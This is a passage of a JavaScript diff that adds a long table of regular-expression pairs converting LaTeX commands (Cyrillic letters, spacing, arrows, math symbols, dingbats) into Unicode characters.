[/\\cyrchar\\cyriotlyus /g, '\u0469'], + [/\\cyrchar\\CYRBYUS /g, '\u046A'], + [/\\cyrchar\\CYRIOTBYUS /g, '\u046C'], + [/\\cyrchar\\cyriotbyus /g, '\u046D'], + [/\\cyrchar\\CYRKSI /g, '\u046E'], + [/\\cyrchar\\cyrksi /g, '\u046F'], + [/\\cyrchar\\CYRPSI /g, '\u0470'], + [/\\cyrchar\\cyrpsi /g, '\u0471'], + [/\\cyrchar\\CYRFITA /g, '\u0472'], + [/\\cyrchar\\CYRIZH /g, '\u0474'], + [/\\cyrchar\\CYRUK /g, '\u0478'], + [/\\cyrchar\\cyruk /g, '\u0479'], + [/\\cyrchar\\CYROMEGARND /g, '\u047A'], + [/\\cyrchar\\cyromegarnd /g, '\u047B'], + [/\\cyrchar\\CYROMEGATITLO /g, '\u047C'], + [/\\cyrchar\\cyromegatitlo /g, '\u047D'], + [/\\cyrchar\\CYROT /g, '\u047E'], + [/\\cyrchar\\cyrot /g, '\u047F'], + [/\\cyrchar\\CYRKOPPA /g, '\u0480'], + [/\\cyrchar\\cyrkoppa /g, '\u0481'], + [/\\cyrchar\\cyrthousands /g, '\u0482'], + [/\\cyrchar\\cyrhundredthousands /g, '\u0488'], + [/\\cyrchar\\cyrmillions /g, '\u0489'], + [/\\cyrchar\\CYRSEMISFTSN /g, '\u048C'], + [/\\cyrchar\\cyrsemisftsn /g, '\u048D'], + [/\\cyrchar\\CYRRTICK /g, '\u048E'], + [/\\cyrchar\\cyrrtick /g, '\u048F'], + [/\\cyrchar\\CYRGUP /g, '\u0490'], + [/\\cyrchar\\cyrgup /g, '\u0491'], + [/\\cyrchar\\CYRGHCRS /g, '\u0492'], + [/\\cyrchar\\cyrghcrs /g, '\u0493'], + [/\\cyrchar\\CYRGHK /g, '\u0494'], + [/\\cyrchar\\cyrghk /g, '\u0495'], + [/\\cyrchar\\CYRZHDSC /g, '\u0496'], + [/\\cyrchar\\cyrzhdsc /g, '\u0497'], + [/\\cyrchar\\CYRZDSC /g, '\u0498'], + [/\\cyrchar\\cyrzdsc /g, '\u0499'], + [/\\cyrchar\\CYRKDSC /g, '\u049A'], + [/\\cyrchar\\cyrkdsc /g, '\u049B'], + [/\\cyrchar\\CYRKVCRS /g, '\u049C'], + [/\\cyrchar\\cyrkvcrs /g, '\u049D'], + [/\\cyrchar\\CYRKHCRS /g, '\u049E'], + [/\\cyrchar\\cyrkhcrs /g, '\u049F'], + [/\\cyrchar\\CYRKBEAK /g, '\u04A0'], + [/\\cyrchar\\cyrkbeak /g, '\u04A1'], + [/\\cyrchar\\CYRNDSC /g, '\u04A2'], + [/\\cyrchar\\cyrndsc /g, '\u04A3'], + [/\\cyrchar\\CYRNG /g, '\u04A4'], + [/\\cyrchar\\cyrng /g, '\u04A5'], + [/\\cyrchar\\CYRPHK /g, '\u04A6'], + [/\\cyrchar\\cyrphk /g, '\u04A7'], + [/\\cyrchar\\CYRABHHA /g, '\u04A8'], + [/\\cyrchar\\cyrabhha /g, '\u04A9'], + [/\\cyrchar\\CYRSDSC /g, '\u04AA'], + [/\\cyrchar\\cyrsdsc /g, '\u04AB'], + [/\\cyrchar\\CYRTDSC /g, '\u04AC'], + [/\\cyrchar\\cyrtdsc /g, '\u04AD'], + [/\\cyrchar\\CYRY /g, '\u04AE'], + [/\\cyrchar\\cyry /g, '\u04AF'], + [/\\cyrchar\\CYRYHCRS /g, '\u04B0'], + [/\\cyrchar\\cyryhcrs /g, '\u04B1'], + [/\\cyrchar\\CYRHDSC /g, '\u04B2'], + [/\\cyrchar\\cyrhdsc /g, '\u04B3'], + [/\\cyrchar\\CYRTETSE /g, '\u04B4'], + [/\\cyrchar\\cyrtetse /g, '\u04B5'], + [/\\cyrchar\\CYRCHRDSC /g, '\u04B6'], + [/\\cyrchar\\cyrchrdsc /g, '\u04B7'], + [/\\cyrchar\\CYRCHVCRS /g, '\u04B8'], + [/\\cyrchar\\cyrchvcrs /g, '\u04B9'], + [/\\cyrchar\\CYRSHHA /g, '\u04BA'], + [/\\cyrchar\\cyrshha /g, '\u04BB'], + [/\\cyrchar\\CYRABHCH /g, '\u04BC'], + [/\\cyrchar\\cyrabhch /g, '\u04BD'], + [/\\cyrchar\\CYRABHCHDSC /g, '\u04BE'], + [/\\cyrchar\\cyrabhchdsc /g, '\u04BF'], + [/\\cyrchar\\CYRpalochka /g, '\u04C0'], + [/\\cyrchar\\CYRKHK /g, '\u04C3'], + [/\\cyrchar\\cyrkhk /g, '\u04C4'], + [/\\cyrchar\\CYRNHK /g, '\u04C7'], + [/\\cyrchar\\cyrnhk /g, '\u04C8'], + [/\\cyrchar\\CYRCHLDSC /g, '\u04CB'], + [/\\cyrchar\\cyrchldsc /g, '\u04CC'], + [/\\cyrchar\\CYRAE /g, '\u04D4'], + [/\\cyrchar\\cyrae /g, '\u04D5'], + [/\\cyrchar\\CYRSCHWA /g, '\u04D8'], + [/\\cyrchar\\cyrschwa /g, '\u04D9'], + [/\\cyrchar\\CYRABHDZE /g, '\u04E0'], + [/\\cyrchar\\cyrabhdze /g, '\u04E1'], + [/\\cyrchar\\CYROTLD /g, '\u04E8'], + [/\\cyrchar\\cyrotld /g, '\u04E9'], + [/\\hspace\{0.6em\}/g, '\u2002'], + [/\\hspace\{1em\}/g, '\u2003'], + [/\\hspace\{0.33em\}/g, '\u2004'], + [/\\hspace\{0.25em\}/g, '\u2005'], + [/\\hspace\{0.166em\}/g, '\u2006'], + [/\\hphantom\{0\}/g, '\u2007'], + [/\\hphantom\{,\}/g, '\u2008'], + [/\\hspace\{0.167em\}/g, '\u2009'], + [/\\mkern1mu /g, '\u200A'], + [/\\textendash /g, '\u2013'], + [/\\textemdash /g, '\u2014'], + [/\\rule\{1em\}\{1pt\}/g, '\u2015'], + [/\\Vert /g, '\u2016'], + [/\\Elzreapos /g, '\u201B'], + [/\\textquotedblleft /g, '\u201C'], + [/\\textquotedblright /g, '\u201D'], + [/\\textdagger /g, '\u2020'], + [/\\textdaggerdbl /g, '\u2021'], + [/\\textbullet /g, '\u2022'], + [/\\ldots /g, '\u2026'], + [/\\textperthousand /g, '\u2030'], + [/\\textpertenthousand /g, '\u2031'], + [/\\backprime /g, '\u2035'], + [/\\guilsinglleft /g, '\u2039'], + [/\\guilsinglright /g, '\u203A'], + [/\\mkern4mu /g, '\u205F'], + [/\\nolinebreak /g, '\u2060'], + [/\\ensuremath\{\\Elzpes\}/g, '\u20A7'], + [/\\mbox\{\\texteuro\} /g, '\u20AC'], + [/\\dddot /g, '\u20DB'], + [/\\ddddot /g, '\u20DC'], + [/\\mathbb\{C\}/g, '\u2102'], + [/\\mathscr\{g\}/g, '\u210A'], + [/\\mathscr\{H\}/g, '\u210B'], + [/\\mathfrak\{H\}/g, '\u210C'], + [/\\mathbb\{H\}/g, '\u210D'], + [/\\hslash /g, '\u210F'], + [/\\mathscr\{I\}/g, '\u2110'], + [/\\mathfrak\{I\}/g, '\u2111'], + [/\\mathscr\{L\}/g, '\u2112'], + [/\\mathscr\{l\}/g, '\u2113'], + [/\\mathbb\{N\}/g, '\u2115'], + [/\\cyrchar\\textnumero /g, '\u2116'], + [/\\wp /g, '\u2118'], + [/\\mathbb\{P\}/g, '\u2119'], + [/\\mathbb\{Q\}/g, '\u211A'], + [/\\mathscr\{R\}/g, '\u211B'], + [/\\mathfrak\{R\}/g, '\u211C'], + [/\\mathbb\{R\}/g, '\u211D'], + [/\\Elzxrat /g, '\u211E'], + [/\\texttrademark /g, '\u2122'], + [/\\mathbb\{Z\}/g, '\u2124'], + [/\\Omega /g, '\u2126'], + [/\\mho /g, '\u2127'], + [/\\mathfrak\{Z\}/g, '\u2128'], + [/\\ElsevierGlyph\{2129\}/g, '\u2129'], + [/\\AA /g, '\u212B'], + [/\\mathscr\{B\}/g, '\u212C'], + [/\\mathfrak\{C\}/g, '\u212D'], + [/\\mathscr\{e\}/g, '\u212F'], + [/\\mathscr\{E\}/g, '\u2130'], + [/\\mathscr\{F\}/g, '\u2131'], + [/\\mathscr\{M\}/g, '\u2133'], + [/\\mathscr\{o\}/g, '\u2134'], + [/\\aleph /g, '\u2135'], + [/\\beth /g, '\u2136'], + [/\\gimel /g, '\u2137'], + [/\\daleth /g, '\u2138'], + [/\\textfrac\{1\}\{3\}/g, '\u2153'], + [/\\textfrac\{2\}\{3\}/g, '\u2154'], + [/\\textfrac\{1\}\{5\}/g, '\u2155'], + [/\\textfrac\{2\}\{5\}/g, '\u2156'], + [/\\textfrac\{3\}\{5\}/g, '\u2157'], + [/\\textfrac\{4\}\{5\}/g, '\u2158'], + [/\\textfrac\{1\}\{6\}/g, '\u2159'], + [/\\textfrac\{5\}\{6\}/g, '\u215A'], + [/\\textfrac\{1\}\{8\}/g, '\u215B'], + [/\\textfrac\{3\}\{8\}/g, '\u215C'], + [/\\textfrac\{5\}\{8\}/g, '\u215D'], + [/\\textfrac\{7\}\{8\}/g, '\u215E'], + [/\\leftarrow /g, '\u2190'], + [/\\uparrow /g, '\u2191'], + [/\\rightarrow /g, '\u2192'], + [/\\downarrow /g, '\u2193'], + [/\\leftrightarrow /g, '\u2194'], + [/\\updownarrow /g, '\u2195'], + [/\\nwarrow /g, '\u2196'], + [/\\nearrow /g, '\u2197'], + [/\\searrow /g, '\u2198'], + [/\\swarrow /g, '\u2199'], + [/\\nleftarrow /g, '\u219A'], + [/\\nrightarrow /g, '\u219B'], + [/\\arrowwaveright /g, '\u219C'], + [/\\arrowwaveright /g, '\u219D'], + [/\\twoheadleftarrow /g, '\u219E'], + [/\\twoheadrightarrow /g, '\u21A0'], + [/\\leftarrowtail /g, '\u21A2'], + [/\\rightarrowtail /g, '\u21A3'], + [/\\mapsto /g, '\u21A6'], + [/\\hookleftarrow /g, '\u21A9'], + [/\\hookrightarrow /g, '\u21AA'], + [/\\looparrowleft /g, '\u21AB'], + [/\\looparrowright /g, '\u21AC'], + [/\\leftrightsquigarrow /g, '\u21AD'], + [/\\nleftrightarrow /g, '\u21AE'], + [/\\Lsh /g, '\u21B0'], + [/\\Rsh /g, '\u21B1'], + [/\\ElsevierGlyph\{21B3\}/g, '\u21B3'], + [/\\curvearrowleft /g, '\u21B6'], + [/\\curvearrowright /g, '\u21B7'], + [/\\circlearrowleft /g, '\u21BA'], + [/\\circlearrowright /g, '\u21BB'], + [/\\leftharpoonup /g, '\u21BC'], + [/\\leftharpoondown /g, '\u21BD'], + [/\\upharpoonright /g, '\u21BE'], + [/\\upharpoonleft /g, '\u21BF'], + [/\\rightharpoonup /g, '\u21C0'], + [/\\rightharpoondown /g, '\u21C1'], + [/\\downharpoonright /g, '\u21C2'], + [/\\downharpoonleft /g, '\u21C3'], + [/\\rightleftarrows /g, '\u21C4'], + [/\\dblarrowupdown /g, '\u21C5'], + [/\\leftrightarrows /g, '\u21C6'], + [/\\leftleftarrows /g, '\u21C7'], + [/\\upuparrows /g, '\u21C8'], + [/\\rightrightarrows /g, '\u21C9'], + [/\\downdownarrows /g, '\u21CA'], + [/\\leftrightharpoons /g, '\u21CB'], + [/\\rightleftharpoons /g, '\u21CC'], + [/\\nLeftarrow /g, '\u21CD'], + [/\\nLeftrightarrow /g, '\u21CE'], + [/\\nRightarrow /g, '\u21CF'], + [/\\Leftarrow /g, '\u21D0'], + [/\\Uparrow /g, '\u21D1'], + [/\\Rightarrow /g, '\u21D2'], + [/\\Downarrow /g, '\u21D3'], + [/\\Leftrightarrow /g, '\u21D4'], + [/\\Updownarrow /g, '\u21D5'], + [/\\Lleftarrow /g, '\u21DA'], + [/\\Rrightarrow /g, '\u21DB'], + [/\\rightsquigarrow /g, '\u21DD'], + [/\\DownArrowUpArrow /g, '\u21F5'], + [/\\forall /g, '\u2200'], + [/\\complement /g, '\u2201'], + [/\\partial /g, '\u2202'], + [/\\exists /g, '\u2203'], + [/\\nexists /g, '\u2204'], + [/\\varnothing /g, '\u2205'], + [/\\nabla /g, '\u2207'], + [/\\in /g, '\u2208'], + [/\\not\\in /g, '\u2209'], + [/\\ni /g, '\u220B'], + [/\\not\\ni /g, '\u220C'], + [/\\prod /g, '\u220F'], + [/\\coprod /g, '\u2210'], + [/\\sum /g, '\u2211'], + [/\\mp /g, '\u2213'], + [/\\dotplus /g, '\u2214'], + [/\\setminus /g, '\u2216'], + [/\\circ /g, '\u2218'], + [/\\bullet /g, '\u2219'], + [/\\surd /g, '\u221A'], + [/\\propto /g, '\u221D'], + [/\\infty /g, '\u221E'], + [/\\rightangle /g, '\u221F'], + [/\\angle /g, '\u2220'], + [/\\measuredangle /g, '\u2221'], + [/\\sphericalangle /g, '\u2222'], + [/\\mid /g, '\u2223'], + [/\\nmid /g, '\u2224'], + [/\\parallel /g, '\u2225'], + [/\\nparallel /g, '\u2226'], + [/\\wedge /g, '\u2227'], + [/\\vee /g, '\u2228'], + [/\\cap /g, '\u2229'], + [/\\cup /g, '\u222A'], + [/\\int /g, '\u222B'], + [/\\int\\!\\int /g, '\u222C'], + [/\\int\\!\\int\\!\\int /g, '\u222D'], + [/\\oint /g, '\u222E'], + [/\\surfintegral /g, '\u222F'], + [/\\volintegral /g, '\u2230'], + [/\\clwintegral /g, '\u2231'], + [/\\ElsevierGlyph\{2232\}/g, '\u2232'], + [/\\ElsevierGlyph\{2233\}/g, '\u2233'], + [/\\therefore /g, '\u2234'], + [/\\because /g, '\u2235'], + [/\\Colon /g, '\u2237'], + [/\\ElsevierGlyph\{2238\}/g, '\u2238'], + [/\\mathbin\{\{:\}\\!\\!\{\-\}\\!\\!\{:\}\}/g, '\u223A'], + [/\\homothetic /g, '\u223B'], + [/\\sim /g, '\u223C'], + [/\\backsim /g, '\u223D'], + [/\\lazysinv /g, '\u223E'], + [/\\wr /g, '\u2240'], + [/\\not\\sim /g, '\u2241'], + [/\\ElsevierGlyph\{2242\}/g, '\u2242'], + [/\\NotEqualTilde /g, '\u2242-00338'], + [/\\simeq /g, '\u2243'], + [/\\not\\simeq /g, '\u2244'], + [/\\cong /g, '\u2245'], + [/\\approxnotequal /g, '\u2246'], + [/\\not\\cong /g, '\u2247'], + [/\\approx /g, '\u2248'], + [/\\not\\approx /g, '\u2249'], + [/\\approxeq /g, '\u224A'], + [/\\tildetrpl /g, '\u224B'], + [/\\not\\apid /g, '\u224B-00338'], + [/\\allequal /g, '\u224C'], + [/\\asymp /g, '\u224D'], + [/\\Bumpeq /g, '\u224E'], + [/\\NotHumpDownHump /g, '\u224E-00338'], + [/\\bumpeq /g, '\u224F'], + [/\\NotHumpEqual /g, '\u224F-00338'], + [/\\doteq /g, '\u2250'], + [/\\not\\doteq/g, '\u2250-00338'], + [/\\doteqdot /g, '\u2251'], + [/\\fallingdotseq /g, '\u2252'], + [/\\risingdotseq /g, '\u2253'], + [/\\eqcirc /g, '\u2256'], + [/\\circeq /g, '\u2257'], + [/\\estimates /g, '\u2259'], + [/\\ElsevierGlyph\{225A\}/g, '\u225A'], + [/\\starequal /g, '\u225B'], + [/\\triangleq /g, '\u225C'], + [/\\ElsevierGlyph\{225F\}/g, '\u225F'], + [/\\not =/g, '\u2260'], + [/\\equiv /g, '\u2261'], + [/\\not\\equiv /g, '\u2262'], + [/\\leq /g, '\u2264'], + [/\\geq /g, '\u2265'], + [/\\leqq /g, '\u2266'], + [/\\geqq /g, '\u2267'], + [/\\lneqq /g, '\u2268'], + [/\\lvertneqq /g, '\u2268-0FE00'], + [/\\gneqq /g, '\u2269'], + [/\\gvertneqq /g, '\u2269-0FE00'], + [/\\ll /g, '\u226A'], + [/\\NotLessLess /g, '\u226A-00338'], + [/\\gg /g, '\u226B'], + [/\\NotGreaterGreater /g, '\u226B-00338'], + [/\\between /g, '\u226C'], + [/\\not\\kern\-0.3em\\times /g, '\u226D'], + [/\\not</g, '\u226E'], + [/\\not>/g, '\u226F'], + [/\\not\\leq /g, '\u2270'], + [/\\not\\geq /g, '\u2271'], + [/\\lessequivlnt /g, '\u2272'], + [/\\greaterequivlnt /g, '\u2273'], + [/\\ElsevierGlyph\{2274\}/g, '\u2274'], + [/\\ElsevierGlyph\{2275\}/g, '\u2275'], + [/\\lessgtr /g, '\u2276'], + [/\\gtrless /g, '\u2277'], + [/\\notlessgreater /g, '\u2278'], + [/\\notgreaterless /g, '\u2279'], + [/\\prec /g, '\u227A'], + [/\\succ /g, '\u227B'], + [/\\preccurlyeq /g, '\u227C'], + [/\\succcurlyeq /g, '\u227D'], + [/\\precapprox /g, '\u227E'], + [/\\NotPrecedesTilde /g, '\u227E-00338'], + [/\\succapprox /g, '\u227F'], + [/\\NotSucceedsTilde /g, '\u227F-00338'], + [/\\not\\prec /g, '\u2280'], + [/\\not\\succ /g, '\u2281'], + [/\\subset /g, '\u2282'], + [/\\supset /g, '\u2283'], + [/\\not\\subset /g, '\u2284'], + [/\\not\\supset /g, '\u2285'], + [/\\subseteq /g, '\u2286'], + [/\\supseteq /g, '\u2287'], + [/\\not\\subseteq /g, '\u2288'], + [/\\not\\supseteq /g, '\u2289'], + [/\\subsetneq /g, '\u228A'], + [/\\varsubsetneqq /g, '\u228A-0FE00'], + [/\\supsetneq /g, '\u228B'], + [/\\varsupsetneq /g, '\u228B-0FE00'], + [/\\uplus /g, '\u228E'], + [/\\sqsubset /g, '\u228F'], + [/\\NotSquareSubset /g, '\u228F-00338'], + [/\\sqsupset /g, '\u2290'], + [/\\NotSquareSuperset /g, '\u2290-00338'], + [/\\sqsubseteq /g, '\u2291'], + [/\\sqsupseteq /g, '\u2292'], + [/\\sqcap /g, '\u2293'], + [/\\sqcup /g, '\u2294'], + [/\\oplus /g, '\u2295'], + [/\\ominus /g, '\u2296'], + [/\\otimes /g, '\u2297'], + [/\\oslash /g, '\u2298'], + [/\\odot /g, '\u2299'], + [/\\circledcirc /g, '\u229A'], + [/\\circledast /g, '\u229B'], + [/\\circleddash /g, '\u229D'], + [/\\boxplus /g, '\u229E'], + [/\\boxminus /g, '\u229F'], + [/\\boxtimes /g, '\u22A0'], + [/\\boxdot /g, '\u22A1'], + [/\\vdash /g, '\u22A2'], + [/\\dashv /g, '\u22A3'], + [/\\top /g, '\u22A4'], + [/\\perp /g, '\u22A5'], + [/\\truestate /g, '\u22A7'], + [/\\forcesextra /g, '\u22A8'], + [/\\Vdash /g, '\u22A9'], + [/\\Vvdash /g, '\u22AA'], + [/\\VDash /g, '\u22AB'], + [/\\nvdash /g, '\u22AC'], + [/\\nvDash /g, '\u22AD'], + [/\\nVdash /g, '\u22AE'], + [/\\nVDash /g, '\u22AF'], + [/\\vartriangleleft /g, '\u22B2'], + [/\\vartriangleright /g, '\u22B3'], + [/\\trianglelefteq /g, '\u22B4'], + [/\\trianglerighteq /g, '\u22B5'], + [/\\original /g, '\u22B6'], + [/\\image /g, '\u22B7'], + [/\\multimap /g, '\u22B8'], + [/\\hermitconjmatrix /g, '\u22B9'], + [/\\intercal /g, '\u22BA'], + [/\\veebar /g, '\u22BB'], + [/\\rightanglearc /g, '\u22BE'], + [/\\ElsevierGlyph\{22C0\}/g, '\u22C0'], + [/\\ElsevierGlyph\{22C1\}/g, '\u22C1'], + [/\\bigcap /g, '\u22C2'], + [/\\bigcup /g, '\u22C3'], + [/\\diamond /g, '\u22C4'], + [/\\cdot /g, '\u22C5'], + [/\\star /g, '\u22C6'], + [/\\divideontimes /g, '\u22C7'], + [/\\bowtie /g, '\u22C8'], + [/\\ltimes /g, '\u22C9'], + [/\\rtimes /g, '\u22CA'], + [/\\leftthreetimes /g, '\u22CB'], + [/\\rightthreetimes /g, '\u22CC'], + [/\\backsimeq /g, '\u22CD'], + [/\\curlyvee /g, '\u22CE'], + [/\\curlywedge /g, '\u22CF'], + [/\\Subset /g, '\u22D0'], + [/\\Supset /g, '\u22D1'], + [/\\Cap /g, '\u22D2'], + [/\\Cup /g, '\u22D3'], + [/\\pitchfork /g, '\u22D4'], + [/\\lessdot /g, '\u22D6'], + [/\\gtrdot /g, '\u22D7'], + [/\\verymuchless /g, '\u22D8'], + [/\\verymuchgreater /g, '\u22D9'], + [/\\lesseqgtr /g, '\u22DA'], + [/\\gtreqless /g, '\u22DB'], + [/\\curlyeqprec /g, '\u22DE'], + [/\\curlyeqsucc /g, '\u22DF'], + [/\\not\\sqsubseteq /g, '\u22E2'], + [/\\not\\sqsupseteq /g, '\u22E3'], + [/\\Elzsqspne /g, '\u22E5'], + [/\\lnsim /g, '\u22E6'], + [/\\gnsim /g, '\u22E7'], + [/\\precedesnotsimilar /g, '\u22E8'], + [/\\succnsim /g, '\u22E9'], + [/\\ntriangleleft /g, '\u22EA'], + [/\\ntriangleright /g, '\u22EB'], + [/\\ntrianglelefteq /g, '\u22EC'], + [/\\ntrianglerighteq /g, '\u22ED'], + [/\\vdots /g, '\u22EE'], + [/\\cdots /g, '\u22EF'], + [/\\upslopeellipsis /g, '\u22F0'], + [/\\downslopeellipsis /g, '\u22F1'], + [/\\barwedge /g, '\u2305'], + [/\\perspcorrespond /g, '\u2306'], + [/\\lceil /g, '\u2308'], + [/\\rceil /g, '\u2309'], + [/\\lfloor /g, '\u230A'], + [/\\rfloor /g, '\u230B'], + [/\\recorder /g, '\u2315'], + [/\\mathchar"2208/g, '\u2316'], + [/\\ulcorner /g, '\u231C'], + [/\\urcorner /g, '\u231D'], + [/\\llcorner /g, '\u231E'], + [/\\lrcorner /g, '\u231F'], + [/\\frown /g, '\u2322'], + [/\\smile /g, '\u2323'], + [/\\langle /g, '\u2329'], + [/\\rangle /g, '\u232A'], + [/\\ElsevierGlyph\{E838\}/g, '\u233D'], + [/\\Elzdlcorn /g, '\u23A3'], + [/\\lmoustache /g, '\u23B0'], + [/\\rmoustache /g, '\u23B1'], + [/\\textvisiblespace /g, '\u2423'], + [/\\ding\{172\}/g, '\u2460'], + [/\\ding\{173\}/g, '\u2461'], + [/\\ding\{174\}/g, '\u2462'], + [/\\ding\{175\}/g, '\u2463'], + [/\\ding\{176\}/g, '\u2464'], + [/\\ding\{177\}/g, '\u2465'], + [/\\ding\{178\}/g, '\u2466'], + [/\\ding\{179\}/g, '\u2467'], + [/\\ding\{180\}/g, '\u2468'], + [/\\ding\{181\}/g, '\u2469'], + [/\\circledS /g, '\u24C8'], + [/\\Elzdshfnc /g, '\u2506'], + [/\\Elzsqfnw /g, '\u2519'], + [/\\diagup /g, '\u2571'], + [/\\ding\{110\}/g, '\u25A0'], + [/\\square /g, '\u25A1'], + [/\\blacksquare /g, '\u25AA'], + [/\\fbox\{~~\}/g, '\u25AD'], + [/\\Elzvrecto /g, '\u25AF'], + [/\\ElsevierGlyph\{E381\}/g, '\u25B1'], + [/\\ding\{115\}/g, '\u25B2'], + [/\\bigtriangleup /g, '\u25B3'], + [/\\blacktriangle /g, '\u25B4'], + [/\\vartriangle /g, '\u25B5'], + [/\\blacktriangleright /g, '\u25B8'], + [/\\triangleright /g, '\u25B9'], + [/\\ding\{116\}/g, '\u25BC'], + [/\\bigtriangledown /g, '\u25BD'], + [/\\blacktriangledown /g, '\u25BE'], + [/\\triangledown /g, '\u25BF'], + [/\\blacktriangleleft /g, '\u25C2'], + [/\\triangleleft /g, '\u25C3'], + [/\\ding\{117\}/g, '\u25C6'], + [/\\lozenge /g, '\u25CA'], + [/\\bigcirc /g, '\u25CB'], + [/\\ding\{108\}/g, '\u25CF'], + [/\\Elzcirfl /g, '\u25D0'], + [/\\Elzcirfr /g, '\u25D1'], + [/\\Elzcirfb /g, '\u25D2'], + [/\\ding\{119\}/g, '\u25D7'], + [/\\Elzrvbull /g, '\u25D8'], + [/\\Elzsqfl /g, '\u25E7'], + [/\\Elzsqfr /g, '\u25E8'], + [/\\Elzsqfse /g, '\u25EA'], + [/\\bigcirc /g, '\u25EF'], + [/\\ding\{72\}/g, '\u2605'], + [/\\ding\{73\}/g, '\u2606'], + [/\\ding\{37\}/g, '\u260E'], + [/\\ding\{42\}/g, '\u261B'], + [/\\ding\{43\}/g, '\u261E'], + [/\\rightmoon /g, '\u263E'], + [/\\mercury /g, '\u263F'], + [/\\venus /g, '\u2640'], + [/\\male /g, '\u2642'], + [/\\jupiter /g, '\u2643'], + [/\\saturn /g, '\u2644'], + [/\\uranus /g, '\u2645'], + [/\\neptune /g, '\u2646'], + [/\\pluto /g, '\u2647'], + [/\\aries /g, '\u2648'], + [/\\taurus /g, '\u2649'], + [/\\gemini /g, '\u264A'], + [/\\cancer /g, '\u264B'], + [/\\leo /g, '\u264C'], + [/\\virgo /g, '\u264D'], + [/\\libra /g, '\u264E'], + [/\\scorpio /g, '\u264F'], + [/\\sagittarius /g, '\u2650'], + [/\\capricornus /g, '\u2651'], + [/\\aquarius /g, '\u2652'], + [/\\pisces /g, '\u2653'], + [/\\ding\{171\}/g, '\u2660'], + [/\\diamond /g, '\u2662'], + [/\\ding\{168\}/g, '\u2663'], + [/\\ding\{170\}/g, '\u2665'], + [/\\ding\{169\}/g, '\u2666'], + [/\\quarternote /g, '\u2669'], + [/\\eighthnote /g, '\u266A'], + [/\\flat /g, '\u266D'], + [/\\natural /g, '\u266E'], + [/\\sharp /g, '\u266F'], + [/\\ding\{33\}/g, '\u2701'], + [/\\ding\{34\}/g, '\u2702'], + [/\\ding\{35\}/g, '\u2703'], + [/\\ding\{36\}/g, '\u2704'], + [/\\ding\{38\}/g, '\u2706'], + [/\\ding\{39\}/g, '\u2707'], + [/\\ding\{40\}/g, '\u2708'], + [/\\ding\{41\}/g, '\u2709'], + [/\\ding\{44\}/g, '\u270C'], + [/\\ding\{45\}/g, '\u270D'], + [/\\ding\{46\}/g, '\u270E'], + [/\\ding\{47\}/g, '\u270F'], + [/\\ding\{48\}/g, '\u2710'], + [/\\ding\{49\}/g, '\u2711'], + [/\\ding\{50\}/g, '\u2712'], + [/\\ding\{51\}/g, '\u2713'], + [/\\ding\{52\}/g, '\u2714'], + [/\\ding\{53\}/g, '\u2715'], + [/\\ding\{54\}/g, '\u2716'], + [/\\ding\{55\}/g, '\u2717'], + [/\\ding\{56\}/g, '\u2718'], + [/\\ding\{57\}/g, '\u2719'], + [/\\ding\{58\}/g, '\u271A'], + [/\\ding\{59\}/g, '\u271B'], + [/\\ding\{60\}/g, '\u271C'], + [/\\ding\{61\}/g, '\u271D'], + [/\\ding\{62\}/g, '\u271E'], + [/\\ding\{63\}/g, '\u271F'], + [/\\ding\{64\}/g, '\u2720'], + [/\\ding\{65\}/g, '\u2721'], + [/\\ding\{66\}/g, '\u2722'], + [/\\ding\{67\}/g, '\u2723'], + [/\\ding\{68\}/g, '\u2724'], + [/\\ding\{69\}/g, '\u2725'], + [/\\ding\{70\}/g, '\u2726'], + [/\\ding\{71\}/g, '\u2727'], + [/\\ding\{73\}/g, '\u2729'], + [/\\ding\{74\}/g, '\u272A'], + [/\\ding\{75\}/g, '\u272B'], + [/\\ding\{76\}/g, '\u272C'], + [/\\ding\{77\}/g, '\u272D'], + [/\\ding\{78\}/g, '\u272E'], + [/\\ding\{79\}/g, '\u272F'], + [/\\ding\{80\}/g, '\u2730'], + [/\\ding\{81\}/g, '\u2731'], + [/\\ding\{82\}/g, '\u2732'], + [/\\ding\{83\}/g, '\u2733'], + [/\\ding\{84\}/g, '\u2734'], + [/\\ding\{85\}/g, '\u2735'], + [/\\ding\{86\}/g, '\u2736'], + [/\\ding\{87\}/g, '\u2737'], + [/\\ding\{88\}/g, '\u2738'], + [/\\ding\{89\}/g, '\u2739'], + [/\\ding\{90\}/g, '\u273A'], + [/\\ding\{91\}/g, '\u273B'], + [/\\ding\{92\}/g, '\u273C'], + [/\\ding\{93\}/g, '\u273D'], + [/\\ding\{94\}/g, '\u273E'], + [/\\ding\{95\}/g, '\u273F'], + [/\\ding\{96\}/g, '\u2740'], + [/\\ding\{97\}/g, '\u2741'], + [/\\ding\{98\}/g, '\u2742'], + [/\\ding\{99\}/g, '\u2743'], + [/\\ding\{100\}/g, '\u2744'], + [/\\ding\{101\}/g, '\u2745'], + [/\\ding\{102\}/g, '\u2746'], + [/\\ding\{103\}/g, '\u2747'], + [/\\ding\{104\}/g, '\u2748'], + [/\\ding\{105\}/g, '\u2749'], + [/\\ding\{106\}/g, '\u274A'], + [/\\ding\{107\}/g, '\u274B'], + [/\\ding\{109\}/g, '\u274D'], + [/\\ding\{111\}/g, '\u274F'], + [/\\ding\{112\}/g, '\u2750'], + [/\\ding\{113\}/g, '\u2751'], + [/\\ding\{114\}/g, '\u2752'], + [/\\ding\{118\}/g, '\u2756'], + [/\\ding\{120\}/g, '\u2758'], + [/\\ding\{121\}/g, '\u2759'], + [/\\ding\{122\}/g, '\u275A'], + [/\\ding\{123\}/g, '\u275B'], + [/\\ding\{124\}/g, '\u275C'], + [/\\ding\{125\}/g, '\u275D'], + [/\\ding\{126\}/g, '\u275E'], + [/\\ding\{161\}/g, '\u2761'], + [/\\ding\{162\}/g, '\u2762'], + [/\\ding\{163\}/g, '\u2763'], + [/\\ding\{164\}/g, '\u2764'], + [/\\ding\{165\}/g, '\u2765'], + [/\\ding\{166\}/g, '\u2766'], + [/\\ding\{167\}/g, '\u2767'], + [/\\ding\{182\}/g, '\u2776'], + [/\\ding\{183\}/g, '\u2777'], + [/\\ding\{184\}/g, '\u2778'], + [/\\ding\{185\}/g, '\u2779'], + [/\\ding\{186\}/g, '\u277A'], + [/\\ding\{187\}/g, '\u277B'], + [/\\ding\{188\}/g, '\u277C'], + [/\\ding\{189\}/g, '\u277D'], + [/\\ding\{190\}/g, '\u277E'], + [/\\ding\{191\}/g, '\u277F'], + [/\\ding\{192\}/g, '\u2780'], + [/\\ding\{193\}/g, '\u2781'], + [/\\ding\{194\}/g, '\u2782'], + [/\\ding\{195\}/g, '\u2783'], + [/\\ding\{196\}/g, '\u2784'], + [/\\ding\{197\}/g, '\u2785'], + 